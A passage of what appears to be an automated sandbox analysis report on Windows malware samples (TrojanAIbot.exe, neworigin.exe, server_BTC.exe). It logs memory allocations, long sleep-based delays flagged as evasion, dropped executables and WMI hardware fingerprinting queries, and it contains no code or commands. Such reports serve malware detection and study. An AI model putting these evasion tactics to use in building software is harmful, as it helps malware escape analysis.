Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 26A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: CC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2860000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 26D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2250000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 23D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 43D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 5050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: A40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4550000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 7009	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 2775	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1876
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 2993
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 6796
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 6545
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3171
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3732
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 6074

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	Dropped PE file which has not been started: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99824s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072	Thread sleep count: 7009 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99708s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99589s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99478s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 4072	Thread sleep count: 2775 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99166s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98927s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98725s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98603s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98483s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98368s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98260s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98117s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97989s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97846s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97496s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97382s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97160s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -97035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -96912s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -96772s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -96646s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -96522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -96059s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95943s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95818s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95693s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95568s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95443s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95318s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95193s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -95055s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94941s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94818s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94696s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94582s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94459s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94334s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94209s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -94084s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -93960s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -93844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99725s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99616s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99505s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99382s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99261s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99148s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -99039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6160	Thread sleep time: -98803s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep count: 7682 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 892	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep count: 1876 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032	Thread sleep time: -179580000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3032	Thread sleep time: -407760000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6664	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98758s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98377s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98089s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97963s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97713s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97479s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97335s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96552s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96152s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96008s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95868s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95747s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95416s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95272s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95135s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -94898s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -94777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -94635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -94473s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -94153s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99790s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -99076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98962s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98850s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98723s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98182s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -98071s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97964s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97854s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97743s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97524s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97417s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97307s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97197s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -97087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96979s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96869s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96759s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96650s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96540s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96432s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -96103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95994s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95881s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95761s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95519s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 432	Thread sleep time: -95386s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4040	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -39660499758475511s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600	Thread sleep count: 3732 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -99886s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -99771s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -99632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5600	Thread sleep count: 6074 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -99517s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -99376s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98832s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98583s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -98083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97583s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97458s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -97083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96560s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96451s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -96068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -95068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94818s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94693s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94568s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94193s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -94068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -93916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -93660s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -93536s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -93411s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5572	Thread sleep time: -93286s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5756	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
